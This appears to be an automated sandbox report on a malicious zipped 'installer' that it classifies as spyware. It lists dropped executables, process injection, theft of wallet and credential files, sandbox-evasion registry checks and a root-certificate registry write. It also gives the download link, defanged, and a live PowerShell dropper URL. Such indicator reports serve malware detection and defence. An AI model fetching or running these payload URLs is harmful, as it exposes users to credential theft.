hxxps://www[.]mediafire[.]com/file/t7luh6kz7nvww4b/x64__installer_x32__[.]zip/file

Analysis

max time kernel
439s
max time network
405s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
03/07/2024, 21:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.mediafire.com/file/t7luh6kz7nvww4b/x64__installer_x32__.zip/file

Score

10^/10

discovery execution spyware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://two-root.com/02074.bs64

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
387	5536	MsiExec.exe
389	5536	MsiExec.exe
399	2524	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2524	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 7 IoCs

pid	Process
2692	processhacker-2.39-setup.exe
6080	processhacker-2.39-setup.tmp
5224	ProcessHacker.exe
4348	UnRAR.exe
2108	rnpkeys.exe
3260	FCGIJDBAFC.exe
4284	Autoit3.exe

Loads dropped DLL 53 IoCs

pid	Process
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5224	ProcessHacker.exe
5536	MsiExec.exe
5536	MsiExec.exe
5536	MsiExec.exe
5536	MsiExec.exe
5536	MsiExec.exe
5536	MsiExec.exe
5536	MsiExec.exe
5536	MsiExec.exe
2108	rnpkeys.exe
1088	explorer.exe
1088	explorer.exe
2704	MsiExec.exe
2704	MsiExec.exe
2704	MsiExec.exe
2704	MsiExec.exe
2704	MsiExec.exe
2704	MsiExec.exe
4072	MsiExec.exe
4072	MsiExec.exe
4072	MsiExec.exe
4072	MsiExec.exe
4072	MsiExec.exe
4072	MsiExec.exe
4620	MsiExec.exe
4620	MsiExec.exe
4620	MsiExec.exe
4620	MsiExec.exe
4620	MsiExec.exe
4620	MsiExec.exe
5868	MsiExec.exe
5868	MsiExec.exe
5868	MsiExec.exe
5868	MsiExec.exe
5868	MsiExec.exe
5868	MsiExec.exe
1784	MsiExec.exe
1784	MsiExec.exe
1784	MsiExec.exe
1784	MsiExec.exe
1784	MsiExec.exe
1784	MsiExec.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	ProcessHacker.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	ProcessHacker.exe

Command and Scripting Interpreter: AutoIT 1 TTPs 1 IoCs

Using AutoIT for possible automate script.

execution

AutoHotKey & AutoIT

T1059.010

pid	Process
4284	Autoit3.exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2108 set thread context of 1088	2108	rnpkeys.exe	196

Drops file in Program Files directory 42 IoCs

description	ioc	Process
File created	C:\Program Files\Process Hacker 2\plugins\is-J83RT.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\x86\plugins\is-81PTT.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-AGO2V.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-S3RKO.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-B7VL5.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\unins000.dat	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-H81HU.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\OnlineChecks.dll	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-I5BJF.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-VKQMV.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-4IOEL.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-K2JB1.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-OCT80.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\x86\plugins\DotNetTools.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\HardwareDevices.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\ProcessHacker.exe	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-MAO1B.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\ExtendedServices.dll	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-7GRTB.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-8FRHM.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-L25KD.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-BK16F.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\ExtendedNotifications.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\NetworkTools.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\UserNotes.dll	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-200LE.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-UJID2.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-4TT47.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\DotNetTools.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\SbieSupport.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\x86\ProcessHacker.exe	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\WindowExplorer.dll	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-M0F3M.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-QI1U5.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\x86\is-V6K4Q.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\unins000.dat	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\ExtendedTools.dll	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\ToolStatus.dll	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\plugins\is-H9MQ7.tmp	processhacker-2.39-setup.tmp
File created	C:\Program Files\Process Hacker 2\is-SVP7E.tmp	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\peview.exe	processhacker-2.39-setup.tmp
File opened for modification	C:\Program Files\Process Hacker 2\plugins\Updater.dll	processhacker-2.39-setup.tmp

Drops file in Windows directory 50 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI9FD8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAABB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7DC4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e5b9c8b.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9E12.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9EB1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9EC2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9D08.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7FEC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI89E4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA058.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8954.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8EBC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8EBD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7E25.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4161.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4181.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8A04.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9E82.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7D75.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI41B2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7E55.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8E8C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAED2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI41A2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7DF4.tmp	msiexec.exe
File created	C:\Windows\Installer\e5b9c8b.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4359.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8924.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8994.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8E3C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI90C2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9FF9.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{6FF75648-4DBA-42BE-8DFD-42733DFEB882}	msiexec.exe
File created	C:\Windows\Installer\e5b9c8f.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9F4A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9F99.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8E0C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA038.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4150.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI89A4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8E5D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA1FF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9E52.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAA9A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4101.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7E05.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 21 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\UpperFilters	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Control	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LowerFilters	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\Control	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	ProcessHacker.exe

Checks processor information in registry 2 TTPs 19 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	ProcessHacker.exe
Key opened	\Registry\Machine\Hardware\Description\System\CentralProcessor	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	ProcessHacker.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	explorer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	ProcessHacker.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ProcessHacker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	ProcessHacker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ProcessHacker.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4204450073-1267028356-951339405-1000\{1D354893-F23F-4A86-86EC-EEF5362A1211}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	taskmgr.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	ProcessHacker.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	ProcessHacker.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a